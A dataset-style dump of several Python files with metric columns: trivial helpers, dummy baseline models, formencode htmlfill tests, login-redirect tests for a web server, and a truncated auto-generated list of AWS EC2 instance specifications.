| 0.348948
| 0.001789
| 0
| 0
| 0
| 0
| 0.2249
| 1
| 0.068273
| false
| 0.072289
| 0.004016
| 0
| 0.076305
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
617fde5e790fa32b6a408ccbfac1978e6767ac19
| 48
|
py
|
Python
|
AIPOC/AIPOC/features/basic_ques/basic_question.py
|
aipoc-ai/aipoc
|
6d1c992ab72485b0f2d6a46d6048705dbc03f7f4
|
[
"MIT"
] | null | null | null |
AIPOC/AIPOC/features/basic_ques/basic_question.py
|
aipoc-ai/aipoc
|
6d1c992ab72485b0f2d6a46d6048705dbc03f7f4
|
[
"MIT"
] | 1
|
2021-10-09T07:04:16.000Z
|
2021-10-09T07:04:16.000Z
|
AIPOC/AIPOC/features/basic_ques/basic_question.py
|
aipoc-ai/aipoc
|
6d1c992ab72485b0f2d6a46d6048705dbc03f7f4
|
[
"MIT"
] | null | null | null |
def name_owner():
return "Deepanshu tyagi"
| 12
| 28
| 0.6875
| 6
| 48
| 5.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.208333
| 48
| 3
| 29
| 16
| 0.842105
| 0
| 0
| 0
| 0
| 0
| 0.319149
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
61ae11224c50296c02eee9aed8e249d79fc2f39d
| 2,793
|
py
|
Python
|
models/task1/subtaskb/dummy.py
|
video699/research-system
|
55abcce3deea8f7d48a5f534565714e5c4686185
|
[
"MIT"
] | null | null | null |
models/task1/subtaskb/dummy.py
|
video699/research-system
|
55abcce3deea8f7d48a5f534565714e5c4686185
|
[
"MIT"
] | null | null | null |
models/task1/subtaskb/dummy.py
|
video699/research-system
|
55abcce3deea8f7d48a5f534565714e5c4686185
|
[
"MIT"
] | null | null | null |
"""
This module implements unsupervised task 1, subtask B dummy models that provide baseline
scores and integration testing of the evaluation code.
"""
from random import random, randint
from .base import Model
class Best(Model):
"""
This class represents a task 1, subtask B model that cheats to obtain the best
possible results.
"""
def predict(self, observations):
predictions = []
for screen_video, page_video in observations:
pages = page_video.pages
for screen in screen_video.screens:
prediction = any(page in screen.matching_pages for page in pages)
predictions.append(prediction)
return predictions
def _filename(self):
return "%s.%s" % (__name__, self.__class__.__name__)
def __repr__(self):
return "(Best)"
class Worst(Model):
"""
This class represents a task 1, subtask B model that cheats to obtain the worst
possible results.
"""
def predict(self, observations):
predictions = []
for screen_video, page_video in observations:
pages = page_video.pages
for screen in screen_video.screens:
prediction = all(page not in screen.matching_pages for page in pages)
predictions.append(prediction)
return predictions
def _filename(self):
return "%s.%s" % (__name__, self.__class__.__name__)
def __repr__(self):
return "(Worst)"
class Random(Model):
"""
This class represents a task 1, subtask B model that picks results at random.
"""
def predict(self, observations):
predictions = []
for screen_video, _ in observations:
for __ in screen_video.screens:
prediction = randint(0, 1)
predictions.append(prediction)
return predictions
def _filename(self):
return "%s.%s" % (__name__, self.__class__.__name__)
def __repr__(self):
return "(Random)"
class Conservative(Model):
"""
This class represents a task 1, subtask B model that marks all screens as matchable,
since wrongly marking a screen as non-matchable is costly in terms of the evaluation metric.
"""
def predict(self, observations):
predictions = []
for screen_video, _ in observations:
for __ in screen_video.screens:
prediction = True
predictions.append(prediction)
return predictions
def _filename(self):
return "%s.%s" % (__name__, \
self.__class__.__name__)
def __repr__(self):
return "(Conservative)"
BEST = Best()
WORST = Worst()
RANDOM = Random()
CONSERVATIVE = Conservative()
| 30.358696
| 100
| 0.620122
| 312
| 2,793
| 5.269231
| 0.24359
| 0.053528
| 0.036496
| 0.039538
| 0.721411
| 0.721411
| 0.721411
| 0.721411
| 0.721411
| 0.721411
| 0
| 0.003575
| 0.298962
| 2,793
| 91
| 101
| 30.692308
| 0.836057
| 0.212675
| 0
| 0.649123
| 0
| 0
| 0.026404
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.210526
| false
| 0
| 0.035088
| 0.140351
| 0.526316
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
61b2dd88b0d6ba41ac6d4d8f48e8c4879718fcfa
| 242
|
py
|
Python
|
kvdroid/jclass/android/hardware/camera2/params.py
|
kengoon/PyAndroidKX
|
53b72b51c7b9aec06bbc330e7bf0f2e3a89736e2
|
[
"MIT"
] | 1
|
2021-11-22T17:22:53.000Z
|
2021-11-22T17:22:53.000Z
|
kvdroid/jclass/android/hardware/camera2/params.py
|
kengoon/PyAndroidKX
|
53b72b51c7b9aec06bbc330e7bf0f2e3a89736e2
|
[
"MIT"
] | null | null | null |
kvdroid/jclass/android/hardware/camera2/params.py
|
kengoon/PyAndroidKX
|
53b72b51c7b9aec06bbc330e7bf0f2e3a89736e2
|
[
"MIT"
] | null | null | null |
from jnius import autoclass
from kvdroid.jclass import _class_call
def StreamConfigurationMap(*args, instantiate: bool = False):
return _class_call(autoclass("android.hardware.camera2.params.StreamConfigurationMap"), args, instantiate)
| 34.571429
| 110
| 0.818182
| 27
| 242
| 7.185185
| 0.703704
| 0.092784
| 0.381443
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004587
| 0.099174
| 242
| 6
| 111
| 40.333333
| 0.885321
| 0
| 0
| 0
| 0
| 0
| 0.223141
| 0.223141
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
|
0
| 7
|
4ee4fa6c541f92c57a805d12be45fe60aa44a7bf
| 7,151
|
py
|
Python
|
formencode/tests/test_htmlfill_control.py
|
pgajdos/formencode
|
fe29722f3398fd0b1df7d7db4278a0b2d5f8fda3
|
[
"MIT"
] | 63
|
2015-02-14T11:49:59.000Z
|
2022-02-02T22:15:16.000Z
|
formencode/tests/test_htmlfill_control.py
|
pgajdos/formencode
|
fe29722f3398fd0b1df7d7db4278a0b2d5f8fda3
|
[
"MIT"
] | 102
|
2015-01-08T18:01:46.000Z
|
2022-01-25T01:20:09.000Z
|
formencode/tests/test_htmlfill_control.py
|
pgajdos/formencode
|
fe29722f3398fd0b1df7d7db4278a0b2d5f8fda3
|
[
"MIT"
] | 44
|
2015-01-11T13:22:57.000Z
|
2021-12-02T08:54:17.000Z
|
from __future__ import absolute_import
from formencode import htmlfill
# ==============================================================================
def test_defaults_legacy():
html = """
<input type="text" name="foo" value="bar" />
<input type="text" name="foo" value="biz" />
<input type="text" name="foo" value="bash" />
"""
expected_html = """
<input type="text" name="foo" value="bang" />
<input type="text" name="foo" value="bang" />
<input type="text" name="foo" value="bang" />
"""
rendered_html = htmlfill.render(html, defaults={"foo": "bang"},
force_defaults=True)
assert expected_html == rendered_html
def test_defaults_attr_ignore():
html = """
<input type="text" name="foo" value="bar" data-formencode-ignore="1" />
<input type="text" name="foo" value="" />
<input type="text" name="foo" value="bash" data-formencode-ignore="1" />
<input type="text" name="foo" value="bash" data-formencode-ignore="" />
<input type="text" name="foo" value="bash" data-formencode-ignore />
"""
expected_html = """
<input type="text" name="foo" value="bar" data-formencode-ignore="1" />
<input type="text" name="foo" value="bang" />
<input type="text" name="foo" value="bash" data-formencode-ignore="1" />
<input type="text" name="foo" value="bash" data-formencode-ignore="" />
<input type="text" name="foo" value="bash" data-formencode-ignore />
"""
rendered_html = htmlfill.render(html, defaults={"foo": "bang"},
force_defaults=True,
data_formencode_ignore=True)
assert expected_html == rendered_html
def test_defaults_attr_form():
html = """
<input type="text" name="foo" value="bar" data-formencode-form="a" />
<input type="text" name="foo" value="" data-formencode-form="b" />
<input type="text" name="foo" value="bash" data-formencode-form="c" />
"""
expected_html = """
<input type="text" name="foo" value="bar" data-formencode-form="a" />
<input type="text" name="foo" value="bang" data-formencode-form="b" />
<input type="text" name="foo" value="bash" data-formencode-form="c" />
"""
rendered_html = htmlfill.render(html, defaults={"foo": "bang"},
force_defaults=True,
data_formencode_form="b",)
assert expected_html == rendered_html
# ==============================================================================
def test_error_legacy():
html = """
<input type="text" name="foo" value="bar" />
<input type="text" name="foo" value="biz" />
<input type="text" name="foo" value="bash" />
"""
expected_html = """
<!-- for: foo -->
<span class="error-message">bang</span><br />
<input type="text" name="foo" value="" class="error" />
<input type="text" name="foo" value="" class="error" />
<input type="text" name="foo" value="" class="error" />
"""
rendered_html = htmlfill.render(html, errors={"foo": "bang"},
prefix_error=True)
assert expected_html == rendered_html
def test_error_attr_ignore():
html = """
<input type="text" name="foo" value="bar" data-formencode-form="a" />
<input type="text" name="foo" value="biz" data-formencode-form="b" />
<input type="text" name="foo" value="bash" data-formencode-form="c" />
"""
expected_html = """
<input type="text" name="foo" value="bar" data-formencode-form="a" />
<!-- for: foo -->
<span class="error-message">bang</span><br />
<input type="text" name="foo" value="" data-formencode-form="b" class="error" />
<input type="text" name="foo" value="bash" data-formencode-form="c" />
"""
rendered_html = htmlfill.render(html, errors={"foo": "bang"},
force_defaults=True,
data_formencode_form="b",)
def test_error_attr_form():
html = """
<input type="text" name="foo" value="bar" data-formencode-form="a" />
<input type="text" name="foo" value="" data-formencode-form="b" />
<input type="text" name="foo" value="bash" data-formencode-form="c" />
"""
expected_html = """
<input type="text" name="foo" value="bar" data-formencode-form="a" />
<!-- for: foo -->
<span class="error-message">bang</span><br />
<input type="text" name="foo" value="" data-formencode-form="b" class="error" />
<input type="text" name="foo" value="bash" data-formencode-form="c" />
"""
rendered_html = htmlfill.render(html, errors={"foo": "bang"},
force_defaults=True,
data_formencode_form="b",)
assert expected_html == rendered_html
def test_error_attr_form_alt():
"""note that formencode doesn't keep an indent on the replacement
mixes concepts
note a few things:
1. we expect a leading "<!-- for: apple -->" block, because we are ignoring that tag
1. we expect the leading "<!-- for: apple -->" block to not have an initial newline (\n)
"""
html = """
<form data-formencode-form="a">
<input type="text" name="bar" value="foo" data-formencode-form="a" />
<input type="text" name="foo" value="bar" data-formencode-form="a" />
</form>
<form data-formencode-form="b">
<input type="text" name="bar" value="foo" data-formencode-form="b" />
<input type="text" name="foo" value="" data-formencode-form="b" />
</form>
<form data-formencode-form="c">
<input type="text" name="bar" value="foo" data-formencode-form="c" />
<input type="text" name="foo" value="bash" data-formencode-form="c" />
<input type="text" name="apple" value="pear" data-formencode-form="c" data-formencode-ignore="1" />
</form>
"""
expected_html = """<!-- for: apple -->
<span class="error-message">orange</span><br />
<form data-formencode-form="a">
<input type="text" name="bar" value="foo" data-formencode-form="a" />
<input type="text" name="foo" value="bar" data-formencode-form="a" />
</form>
<form data-formencode-form="b">
<input type="text" name="bar" value="foo" data-formencode-form="b" />
<input type="text" name="foo" value="" data-formencode-form="b" />
</form>
<form data-formencode-form="c">
<input type="text" name="bar" value="bang" data-formencode-form="c" />
<!-- for: foo -->
<span class="error-message">bang</span><br />
<input type="text" name="foo" value="" data-formencode-form="c" class="error" />
<input type="text" name="apple" value="pear" data-formencode-form="c" data-formencode-ignore="1" />
</form>
"""
rendered_html = htmlfill.render(html, defaults={"bar": "bang"},
errors={"foo": "bang", "apple": "orange"},
force_defaults=True,
data_formencode_form="c",
data_formencode_ignore=True,
)
assert expected_html == rendered_html
if __name__ == '__main__':
test_defaults_legacy()
test_defaults_attr_ignore()
test_defaults_attr_form()
test_error_legacy()
test_error_attr_ignore()
test_error_attr_form()
test_error_attr_form_alt()
| 40.174157
| 103
| 0.592924
| 900
| 7,151
| 4.602222
| 0.085556
| 0.117335
| 0.169483
| 0.221632
| 0.881941
| 0.867214
| 0.851521
| 0.845244
| 0.833655
| 0.808064
| 0
| 0.00139
| 0.195078
| 7,151
| 178
| 104
| 40.174157
| 0.718207
| 0.066145
| 0
| 0.777027
| 0
| 0.256757
| 0.641733
| 0.202368
| 0
| 0
| 0
| 0
| 0.040541
| 1
| 0.047297
| false
| 0
| 0.013514
| 0
| 0.060811
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
9c911cf29fdc03e3ab82e2751ca37f8ef5b50e74
| 11,836
|
py
|
Python
|
tests/test_unauthorized_access.py
|
Samsagax/steam-buddy
|
a8465e45648d6f3fcff23bb3b82d5e30e46dc4ed
|
[
"MIT"
] | 76
|
2019-11-30T17:35:55.000Z
|
2021-06-06T23:12:31.000Z
|
tests/test_unauthorized_access.py
|
Samsagax/steam-buddy
|
a8465e45648d6f3fcff23bb3b82d5e30e46dc4ed
|
[
"MIT"
] | 130
|
2019-11-16T00:34:12.000Z
|
2021-06-13T13:14:01.000Z
|
tests/test_unauthorized_access.py
|
Samsagax/steam-buddy
|
a8465e45648d6f3fcff23bb3b82d5e30e46dc4ed
|
[
"MIT"
] | 15
|
2019-11-07T18:32:25.000Z
|
2021-06-12T20:55:40.000Z
|
import os
import pytest
import subprocess
from webtest import TestApp
from chimera_app.server import server
from chimera_app.server import PLATFORM_HANDLERS
from chimera_app.config import PLATFORMS
from chimera_app.config import AUTHENTICATOR_PATH
# Prevent pytest from trying to collect webtest's TestApp as tests:
TestApp.__test__ = False
@pytest.fixture
def unauthorized_app(monkeypatch):
def mock_launch(self):
if not os.path.isfile(AUTHENTICATOR_PATH):
raise FileNotFoundError(
f'Authenticator not found at path {AUTHENTICATOR_PATH}'
)
from chimera_app.authenticator import Authenticator
monkeypatch.setattr(Authenticator, 'launch', mock_launch)
monkeypatch.delattr(subprocess, "call", raising=True)
monkeypatch.delattr(os, "system", raising=True)
yield TestApp(server)
def test_login_page(unauthorized_app):
assert (unauthorized_app.get('/login').status == '200 OK')
def test_root(unauthorized_app):
resp = unauthorized_app.get('/')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_platform_page(unauthorized_app):
for platform in PLATFORMS:
resp = unauthorized_app.get(f'/library/{platform}')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_platform_authenticate(unauthorized_app):
for platform in PLATFORM_HANDLERS:
resp = unauthorized_app.post(f'/library/{platform}/authenticate')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_platform_banners(unauthorized_app):
for platform in PLATFORMS:
resp = unauthorized_app.get('/banners/{platform}/giberish')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_platform_new(unauthorized_app):
for platform in PLATFORMS:
resp = unauthorized_app.get('/library/{platform}/new')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_platform_edit(unauthorized_app):
for platform in PLATFORMS:
resp = unauthorized_app.get('/library/{platform}/edit/giberish')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_flathub_images(unauthorized_app):
resp = unauthorized_app.get('/images/flathub/giberish')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_shortcuts_create(unauthorized_app):
resp = unauthorized_app.post('/shortcuts/new')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_shortcuts_edit(unauthorized_app):
resp = unauthorized_app.post('/shortcuts/edit')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_shortcuts_delete(unauthorized_app):
resp = unauthorized_app.post('/shortcuts/delete')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_shortcuts_file_upload_post(unauthorized_app):
resp = unauthorized_app.post('/shortcuts/file-upload')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_shortcuts_file_upload_patch(unauthorized_app):
resp = unauthorized_app.patch('/shortcuts/file-upload')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_shortcuts_file_upload_head(unauthorized_app):
resp = unauthorized_app.head('/shortcuts/file-upload')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_shortcuts_file_upload_delete(unauthorized_app):
resp = unauthorized_app.delete('/shortcuts/file-upload')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_platform_install(unauthorized_app):
for platform in PLATFORM_HANDLERS:
resp = unauthorized_app.get(f'/{platform}/install/giberish')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_platform_uninstall(unauthorized_app):
for platform in PLATFORM_HANDLERS:
resp = unauthorized_app.get(f'/{platform}/uninstall/giberish')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_platform_update(unauthorized_app):
for platform in PLATFORM_HANDLERS:
resp = unauthorized_app.get(f'/{platform}/update/giberish')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_platform_progress(unauthorized_app):
for platform in PLATFORM_HANDLERS:
resp = unauthorized_app.get(f'/{platform}/update/giberish')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_settings(unauthorized_app):
resp = unauthorized_app.get('/system')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_settings_update(unauthorized_app):
resp = unauthorized_app.post('/system/update')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_mangohud_reset(unauthorized_app):
resp = unauthorized_app.post('/system/reset_mangohud')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_steam_restart(unauthorized_app):
resp = unauthorized_app.get('/actions/steam/restart')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_steam_compositor(unauthorized_app):
resp = unauthorized_app.get('/actions/steam/compositor')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_steam_overlay(unauthorized_app):
resp = unauthorized_app.get('/actions/steam/overlay')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_mangohud(unauthorized_app):
resp = unauthorized_app.get('/actions/mangohud')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_streaming(unauthorized_app):
resp = unauthorized_app.get('/streaming')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_streaming_config(unauthorized_app):
resp = unauthorized_app.get('/streaming/config')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_streaming_add_input(unauthorized_app):
resp = unauthorized_app.post('/streaming/add_input')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_streaming_remove_input(unauthorized_app):
resp = unauthorized_app.post('/streaming/remove_input/123456')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_streaming_add_vcodec(unauthorized_app):
resp = unauthorized_app.post('/streaming/add_vcodec')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_streaming_remove_vcodec(unauthorized_app):
resp = unauthorized_app.post('/streaming/remove_vcodec/123456')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_streaming_add_acodec(unauthorized_app):
resp = unauthorized_app.post('/streaming/add_acodec')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_streaming_remove_acodec(unauthorized_app):
resp = unauthorized_app.post('/streaming/remove_acodec/123456')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_streaming_net_start(unauthorized_app):
resp = unauthorized_app.get('/streaming/net/start')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_streaming_net_stop(unauthorized_app):
resp = unauthorized_app.get('/streaming/net/stop')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_record_start(unauthorized_app):
resp = unauthorized_app.get('/record/start')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_record_stop(unauthorized_app):
resp = unauthorized_app.get('/record/stop')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_mangohud_save_config(unauthorized_app):
resp = unauthorized_app.post('/system/mangohud/save_config')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_mangohud_edit_config(unauthorized_app):
resp = unauthorized_app.get('/system/mangohud/edit_config')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_retroarch_load_state(unauthorized_app):
resp = unauthorized_app.get('/actions/retroarch/load_state')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_retroarch_save_state(unauthorized_app):
resp = unauthorized_app.get('/actions/retroarch/save_state')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_virtual_keyboard(unauthorized_app):
resp = unauthorized_app.get('/virtual_keyboard')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_virtual_keyboard_string(unauthorized_app):
resp = unauthorized_app.post('/virtual_keyboard/string')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_reboot_system(unauthorized_app):
resp = unauthorized_app.get('/actions/reboot')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_poweroff(unauthorized_app):
resp = unauthorized_app.get('/actions/poweroff')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_suspend(unauthorized_app):
resp = unauthorized_app.get('/actions/suspend')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_toggle_mute(unauthorized_app):
resp = unauthorized_app.get('/actions/audio/toggle_mute')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_volume_up(unauthorized_app):
resp = unauthorized_app.get('/actions/audio/volume_up')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_volume_down(unauthorized_app):
resp = unauthorized_app.get('/actions/audio/volume_down')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
def test_audio_profile(unauthorized_app):
resp = unauthorized_app.get('/audio/profile')
assert(resp.status_code == 302)
assert(resp.headers['Location'] == 'http://localhost:80/login')
| 34.608187
| 73
| 0.719922
| 1,470
| 11,836
| 5.588435
| 0.082313
| 0.188071
| 0.115642
| 0.121729
| 0.863055
| 0.841996
| 0.813025
| 0.717955
| 0.640414
| 0.612903
| 0
| 0.026457
| 0.134589
| 11,836
| 341
| 74
| 34.709677
| 0.775554
| 0.005492
| 0
| 0.478448
| 0
| 0
| 0.238168
| 0.066191
| 0
| 0
| 0
| 0
| 0.435345
| 1
| 0.228448
| false
| 0
| 0.038793
| 0
| 0.267241
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9caf7caf98b76ae2503cb7895b275dad2abe395b
| 14,729
|
py
|
Python
|
ec2_compare/internal/instance_type/a.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | null | null | null |
ec2_compare/internal/instance_type/a.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | null | null | null |
ec2_compare/internal/instance_type/a.py
|
frolovv/aws.ec2.compare
|
582805823492f833d65c0441c4a14dce697c12aa
|
[
"Apache-2.0"
] | null | null | null |
# Automatically generated
# pylint: disable=all
get = [{'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 1, 'DefaultCores': 1, 'DefaultThreadsPerCore': 1, 'SizeInMiB': 2048, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 300, 'BaselineThroughputInMBps': 37.5, 'BaselineIops': 2500, 'MaximumBandwidthInMbps': 3500, 'MaximumThroughputInMBps': 437.5, 'MaximumIops': 20000}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 4, 'Ipv6AddressesPerInterface': 4, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'a1.medium', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 1, 'DefaultCores': 1, 'DefaultThreadsPerCore': 1}, 'MemoryInfo': {'SizeInMiB': 2048}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 300, 'BaselineThroughputInMBps': 37.5, 'BaselineIops': 2500, 'MaximumBandwidthInMbps': 3500, 'MaximumThroughputInMBps': 437.5, 'MaximumIops': 20000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 4, 'Ipv6AddressesPerInterface': 4, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['uefi']}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 2, 'DefaultCores': 2, 'DefaultThreadsPerCore': 1, 'SizeInMiB': 4096, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 525, 'BaselineThroughputInMBps': 65.625, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 3500, 'MaximumThroughputInMBps': 437.5, 'MaximumIops': 20000}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'a1.large', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 2, 'DefaultThreadsPerCore': 1}, 'MemoryInfo': {'SizeInMiB': 4096}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 525, 'BaselineThroughputInMBps': 65.625, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 3500, 'MaximumThroughputInMBps': 